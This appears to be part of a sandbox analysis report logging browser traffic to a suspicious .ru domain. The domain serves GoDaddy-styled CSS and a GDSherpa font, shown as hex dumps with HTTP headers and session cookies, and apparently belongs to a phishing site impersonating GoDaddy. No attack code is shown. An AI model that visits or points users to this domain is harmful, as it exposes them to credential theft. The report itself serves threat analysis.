                                                                  2025-03-14 11:31:00 UTC301INData Raw: 31 66 66 38 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 7b 0d 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 67 64 73 68 65 72 70 61 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 61 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 32 72 71 61 70 77 2c 23 30 30 30 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72
                                                                  Data Ascii: 1ff8#sections_godaddy {font-family: gdsherpa !important;}#sections_godaddy a { color: var(--ux-2rqapw,#000); -webkit-text-decoration: var(--ux-1f7if5p,underline); text-decoration: var(--ux-1f7if5p,underline); background-color: transpar
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 3a 20 31 20 31 20 30 25 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 61 3a 68 6f 76 65 72 20 7b 0d 0a 2f 2a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 31 6a 38 37 76 76 6e 2c 23 66 66 66 29 3b 2a 2f 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 74 30 6b 68 6d 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 74 30 6b 68 6d 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 73 76 67 20 7b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67
                                                                  Data Ascii: : 1 1 0%;}#sections_godaddy a:hover {/* color: var(--ux-1j87vvn,#fff);*/ -webkit-text-decoration: var(--ux-1ft0khm,underline); text-decoration: var(--ux-1ft0khm,underline);}#sections_godaddy svg { overflow: hidden; vertical-alig
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 61 64 6a 75 73 74 6d 65 6e 74 2c 31 29 29 3b 0d 0a 20 20 2d 2d 75 78 53 70 61 63 65 2d 2d 67 61 70 2d 73 69 7a 65 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 7a 64 30 73 65 72 2c 33 29 20 2a 20 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 67 61 70 2d 61 64 6a 75 73 74 6d 65 6e 74 2c 31 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 69 6e 6c 69 6e 65 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 69 6e 6c 69 6e 65 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53
                                                                  Data Ascii: -uxSpace--padding-adjustment,1)); --uxSpace--gap-size: calc(var(--ux-zd0ser,3) * var(--ux-1sbfig8,.25rem) * var(--uxSpace--gap-adjustment,1));}#sections_godaddy .ux-space.ux-space--inline:empty { display: inline-flex; inline-size: var(--uxS
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 2d 31 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 30 29 20 76 61 72 28 2d 2d 75 78 2d 6f 6c 30 37 30 33 2c 2f 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 2d 32 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 2d 31 29 20 76 61 72 28 2d 2d 75 78 2d 6f 6c 30 37 30 33 2c 2f 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 31 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 30 29 20 76 61
                                                                  Data Ascii: --uxText--fontSize-1: calc(var(--uxText--fontSize0) var(--ux-ol0703,/) var(--ux-7s4p3v,1.125)); --uxText--fontSize-2: calc(var(--uxText--fontSize-1) var(--ux-ol0703,/) var(--ux-7s4p3v,1.125)); --uxText--fontSize1: calc(var(--uxText--fontSize0) va
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 23 66 66 66 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 39 37 68 33 76 6c 2c 23 64 33 64 33 64 33 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 76 61 72 28 2d 2d 75 78 2d 31 39 77 72 33 6b 71 2c 31 70 78 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 76 61 72 28 2d 2d 75 78 2d 32 6a 75 62 65 73 2c 32 70 78 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 61 6c 65 72 74 20 61 5b 68 72 65 66 5d 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 65 6e 74 72 79 2d 66 69 65
                                                                  Data Ascii: #fff); border-color: var(--ux-97h3vl,#d3d3d3); border-width: var(--ux-19wr3kq,1px); border-radius: var(--ux-2jubes,2px);}#sections_godaddy .ux-alert a[href] { color: inherit; display: inline;}#sections_godaddy .ux-text-entry-fie
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 20 61 75 74 6f 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0d 0a 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 64 2d 66 6c 65 78 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6c 65 78 2d 72 6f 77 20 7b 0d 0a 20 20 66
                                                                  Data Ascii: auto; padding-left: 8px; padding-right: 8px;}#sections_godaddy .container-fluid::after { content: ""; display: table; clear: both;}#sections_godaddy .d-flex { display: flex!important;}#sections_godaddy .flex-row { f
                                                                  2025-03-14 11:31:00 UTC1046INData Raw: 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 62 75 74 74 6f 6e 3a 66 6f 63 75 73 20 7b 0d 0a 20 20 6f 75 74 6c 69 6e 65 3a 20 76 61 72 28 2d 2d 75 78 70 2d 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 2d 6f 75 74 6c 69 6e 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 62 75 74 74 6f 6e 2c 69 6e 70 75 74 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 76 69 73 69 62 6c 65 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64
                                                                  Data Ascii: }#sections_godaddy button:focus { outline: var(--uxp-focus-visible-outline);}#sections_godaddy button,input { margin: 0; font-family: inherit; font-size: inherit; line-height: inherit; overflow: visible;}#sections_godad
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 31 37 63 34 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6c 2d 78 73 2d 31 32 20 7b 0d 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 61 72 64 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 76 61 72 28 2d 2d 75 78 2d 32 6a 75 62 65 73 2c 32 70 78 29 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 63 61 6f 30 36 62 2c 23 66 66 66 29 3b 0d 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 75 78 2d 39 37 68 33 76 6c 2c 23 64 33 64 33 64
                                                                  Data Ascii: 17c4 padding-left: 8px;}#sections_godaddy .col-xs-12 { float: left; width: 100%;}#sections_godaddy .card { border-radius: var(--ux-2jubes,2px); background-color: var(--ux-cao06b,#fff); border: 1px solid var(--ux-97h3vl,#d3d3d
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 20 63 65 6e 74 65 72 3b 0d 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 20 30 3b 0d 0a 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 2d 6d 6f 7a 2d 6d 69 6e 2d 63 6f 6e 74 65 6e 74 3b 0d 0a 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 6d 69 6e 2d 63 6f 6e 74 65 6e 74 3b 0d 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 30 2e 32 35 72 65 6d 29 2a 32 29 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 30 2e 32 35 72 65 6d 29 2a 34 29 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 74 72 61 6e 73 69
                                                                  Data Ascii: center; justify-content: center; flex-shrink: 0; min-width: -moz-min-content; min-width: min-content; white-space: nowrap; padding: calc(var(--ux-1sbfig8,0.25rem)*2) calc(var(--ux-1sbfig8,0.25rem)*4); text-decoration: none; transi
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 30 30 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 39 37 35 37 61 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 3a 61 63 74 69 76 65 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 39 37 35 37 61 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d
                                                                  Data Ascii: 00;}#sections_godaddy .ux-button.ux-button-secondary:not([disabled]):hover { color: #09757a; background-color: #fff;}#sections_godaddy .ux-button.ux-button-secondary:not([disabled]):active { background-color: #09757a; color: #fff;


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.449743104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:59 UTC1412OUTGET /GDSherpa-bold.woff2 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: font
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:00 UTC1148INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Content-Type: font/woff2
                                                                  Content-Length: 28000
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="GDSherpa-bold.woff2"
                                                                  Last-Modified: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPLJrRXRcw5zpZheTwWTYRf1XpVmuJC0TK4Yhh3jW4WLlg4Sjfz8kUUhqzQ0V6wpN5iR0DPo%2BgtvGCuPSo6drILyY3MfdbC92oa67XsoJ25JnE8JKfgrwL4HhITI"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6451&min_rtt=6192&rtt_var=2840&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2322&delivery_rate=344627&cwnd=251&unsent_bytes=0&cid=d1d4c84f5ab7b21c&ts=157&x=0"
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: MISS
                                                                  Accept-Ranges: bytes
                                                                  Server: cloudflare
                                                                  CF-RAY: 920371349f5f428b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1680&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1984&delivery_rate=1690793&cwnd=215&unsent_bytes=0&cid=137cc6b03d412bf2&ts=566&x=0"
                                                                  2025-03-14 11:31:00 UTC221INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34
                                                                  Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20 bc ef 58 a8 f0 9b c5 a1 13 3e 5b 8f 37 84 95 1b dd c4 fb 92 f6 31 3f 3f e9 b5 33 1b 3f 74 d0 95 c5 71 45 fc 1e 66 c9 95 b6 19 62 97 c3 e1 2c c8 92 46 77 63 70 38 ab af 91 34 5e 02 5e 78 9e b1 7c a7 82 a3 c6 52 6f 3c 25 dc d7 22 2e e1 09 81 7e 30 8f 94 71 ee b7 f8 72 50 88 85 47 11 0b b2 82 f4 97 de 52 ff cd dd bc c0 2d 9d bc 7b 4f 92 51 65 4a a9 db c1 16 d8 36 ec 45 cd 8e 9e f6 ff fe b2 ac aa 7b ef 7b 1f 1a d4 a2 16 d0 2c 68 a5 21 8c cc 83 5f bd 04 bd dd 0b 7f 24 03 cb 33 a9 9d 63 46 40 11 87 3e b9 8f a3 0d a2 0d 1d 8d 74 c0 6f f3 ef d1 46 63 20 88 95 18 59 53 8c af ac 8d fe 73 19 56 d4 8c c4 6a b4 99 8b 0e 75 6b 06 60 6e 0e 03 d1 c6 d1 b1 01 23 96 c5 c6
                                                                  Data Ascii: `~Nl4;Sl{w:#=! X>[71??3?tqEfb,Fwcp84^^x|Ro<%".~0qrPGR-{OQeJ6E{{,h!_$3cF@>toFc YSsVjuk`n#
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 5d 4a 97 d3 f5 f4 a4 59 2d 73 e6 2d 58 b4 64 d9 8a 55 6b d6 6d d8 dc d6 b6 77 b0 f6 d0 61 c3 47 8c 1c 35 30 7a cc f8 09 13 27 4d 9e 32 7d c6 cc 59 b3 e7 cc 1d dc f5 1e f7 b9 78 c9 46 1b f3 73 92 35 88 21 b9 90 06 4c a1 ec 44 53 63 41 4a 18 28 48 6b 6b a6 b0 10 96 b2 ea 6e 60 12 8b 54 27 3a 88 0d 21 91 cf 78 89 b0 b1 d8 18 21 22 c5 da ac b1 1d e5 ca f6 61 f6 a8 56 58 53 71 3c 02 8d 44 a2 a2 41 23 e9 58 a6 4f 15 82 22 96 74 9e aa c0 f4 bc 86 89 99 78 96 9e cc 06 39 a9 dd f8 40 7f e2 54 d8 c2 6b b4 1b e6 c5 e1 04 8c 66 32 96 29 88 85 e4 1c c6 0e b7 46 86 56 d0 e4 51 61 62 15 4f 01 27 e6 16 29 b4 dd 95 b0 ee 43 0c a3 4b ea 60 8c c0 09 ad e3 6f 88 46 c1 31 3e 16 2f a6 93 a3 2c a1 5c 8f a6 25 41 94 a6 fc ba 38 e6 29 59 8d b8 09 b2 d6 61 05 83 56 c2 bc b1 90 44
                                                                  Data Ascii: ]JY-s-XdUkmwaG50z'M2}YxFs5!LDScAJ(Hkkn`T':!x!"aVXSq<DA#XO"tx9@Tkf2)FVQabO')CK`oF1>/,\%A8)YaVD
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: c3 e0 bb bd e6 87 fe 1c cc 0d 18 38 fa 62 0b 01 bc 05 33 fb 67 82 27 9d 98 3f 21 ff 23 4c 66 24 d3 27 ca 08 44 a9 f4 ff 94 fa eb 3b bb 83 8b 02 47 f2 cd 86 8c 7f 4e e1 32 e7 d8 15 ae 79 f8 47 8f fa 05 96 b1 d9 36 75 60 b8 9c 89 84 ab 0f ce b6 0d b0 e5 e9 e7 53 21 f4 1c 5b 5e ef 2c e5 1d e5 33 06 58 b9 e3 bf 4b 32 40 cb 15 6f 86 0b 94 4f 42 ca e2 c7 88 be 73 54 45 83 70 c0 53 0f 20 a4 a1 c9 b1 40 1c 44 ef 81 97 5a db 50 18 22 a5 a5 70 8f 5f eb 4d ed 09 f5 04 d0 0c 6c ac d1 b3 da a0 5c ef 6b c9 93 48 d8 73 12 fe 6f 47 42 f7 de 47 8d 7e 39 a2 63 8a a3 c3 11 1b f3 63 3b c1 97 86 57 c5 13 9c 32 39 ea a5 bd 1f e9 a5 a8 95 ab e9 c3 25 f8 f4 7b a0 cc 90 77 51 d2 bd f8 79 19 f2 a2 47 74 0c d9 1e 6c 61 83 6b 8d 97 d4 f3 04 20 e7 2b 63 66 08 c7 02 c4 37 95 09 81 4e
                                                                  Data Ascii: 8b3g'?!#Lf$'D;GN2yG6u`S![^,3XK2@oOBsTEpS @DZP"p_Ml\kHsoGBG~9cc;W29%{wQyGtlak +cf7N
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: eb f5 00 5f 98 7b d5 02 c9 d4 83 39 92 97 e2 70 58 d4 05 60 f1 63 30 c3 d6 0a 9b a6 c4 77 52 42 36 e2 4e 21 d6 57 4e 46 0f 3c c3 ed 46 2e 7c 76 0c b0 f5 48 c7 45 ff c9 ed f1 ab 91 fa 72 a5 ca 0f 4f 04 7a 13 ca b1 46 a7 b9 aa 87 1a 89 7e 63 b0 92 a4 e6 f9 de 46 9f dd 71 be 20 de e9 fd 8c 00 5a c9 1e 8a 23 4a 27 a0 ce 42 1e 5b 6d 40 40 3c bf 46 bf 87 3b 88 a3 bb ff 22 63 84 3f f6 b8 70 7f e1 e6 bf 7e 53 e1 e5 89 5b 97 e8 15 a4 24 20 35 29 73 9b 30 1c 97 3a f4 09 c6 df 6d af a6 d6 b1 39 44 4c 43 64 c3 d7 30 ff 90 97 df d3 35 dd 6c dd 23 7d 72 b0 63 e6 28 7b ec 1b cb 1d 01 12 cf d5 46 05 58 bf 47 3d 6f b5 4b 00 12 0c 03 15 52 e1 0d 36 3c 0b fa cd 75 d3 91 a9 e1 be 6c 7c 7c 41 17 7b 2e f2 7f 71 2f 44 85 82 85 df 24 0a 48 e2 fb 9b a7 1a a3 28 98 5c 14 26 db c4
                                                                  Data Ascii: _{9pX`c0wRB6N!WNF<F.|vHErOzF~cFq Z#J'B[m@@<F;"c?p~S[$ 5)s0:m9DLCd05l#}rc({FXG=oKR6<ul||A{.q/D$H(\&
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: 63 c5 7e 02 a5 42 d3 64 32 44 01 80 0d 52 50 be b2 37 d0 27 5f 0e b0 93 cc 2b 52 29 c2 37 52 bd c4 24 13 01 62 ac 2c 71 16 6d 89 15 43 a2 4a 3b 58 10 63 15 56 19 85 c5 5a 67 71 36 93 89 64 c8 42 5e fa 4a 16 a3 48 89 c8 fb 86 a8 c7 95 6b f6 a2 f4 d9 42 5c e7 8c c8 5f 20 a2 10 a1 50 0e 9d 41 74 56 1d 2a 51 71 92 c8 4a 96 0a ed 93 8a 89 29 51 0e e3 ab 6a 60 7d 4b 03 9c 1f 74 2c 5e 9b da c2 4a 6b 65 09 da 58 6f 5f b0 f2 da 59 6e 1d ac 82 4e 2a fd d5 ab 8a a3 e8 d1 8b ac 4f 3f 69 03 98 28 06 61 15 0d b1 74 67 59 6f d3 2c c5 28 2b 60 8c 95 31 ce 0a 9a 60 9d 2c b0 42 a6 58 17 4b ac b0 19 96 6a 96 c5 9b 63 15 b1 58 bc 05 56 de 22 4b b1 c4 2a 5a 66 05 ad b0 9e ae b3 de 96 59 0a 36 eb ea 6b 96 62 83 e5 75 85 1a 7d 6d ad 20 dd 1d 5e d6 db 5d 77 71 bb cf 4a 7b 30 1e
                                                                  Data Ascii: c~Bd2DRP7'_+R)7R$b,qmCJ;XcVZgq6dB^JHkB\_ PAtV*QqJ)Qj`}Kt,^JkeXo_YnN*O?i(atgYo,(+`1`,BXKjcXV"K*ZfY6kbu}m ^]wqJ{0
                                                                  2025-03-14 11:31:00 UTC1369INData Raw: e8 26 36 b5 d9 cd ef fc 58 bb b4 cb bb b9 db bb 1b e4 e5 dc c3 3d 8d df 4a f9 fe d7 96 4f 37 3f 59 8d e7 9d 71 5e ab 6f d5 3a fd e6 a3 ea 80 0b a6 f8 b7 66 9b 6a f9 f3 de b0 6c 5d 91 41 fb 55 e9 61 b1 07 7f af 1a 07 d4 e9 74 d4 71 87 1d 53 6b 42 d2 61 a3 2a dc 56 2f f9 94 4b e8 6e 35 a0 95 fc 21 95 ba 39 12 3d ac 96 41 e5 cc 83 5e 3e db 79 03 f8 0c 5e cb 96 bf 92 2a 5b bd e6 b9 2a a9 bb e2 91 c7 9e 78 e6 b9 57 66 7d b3 65 db 77 bf e3 de 80 35 64 25 fd 36 92 47 cf 3e 7d 5f 6e e3 ad 58 7f be b1 99 be cd 15 de 0b 26 5e 92 c5 62 ef 35 07 6f 38 79 c7 d1 5b 2e 56 29 5a 45 f7 91 a7 7f 79 f9 44 ce 02 0f ff f0 f2 93 bc 4e c0 f5 02 6f c0 b8 91 b2 35 fb 6e 15 7c 8b bd 77 6a dd 43 b1 df 38 9a 7b 42 ef 12 76 b7 75 e1 ed 45 05 8a e8 20 b2 1d 95 ee 0b e9 e8 2e 62 3b 89
                                                                  Data Ascii: &6X=JO7?Yq^o:fjl]AUatqSkBa*V/Kn5!9=A^>y^*[*xWf}ew5d%6G>}_nX&^b5o8y[.V)ZEyDNo5n|wjC8{BvuE .b;
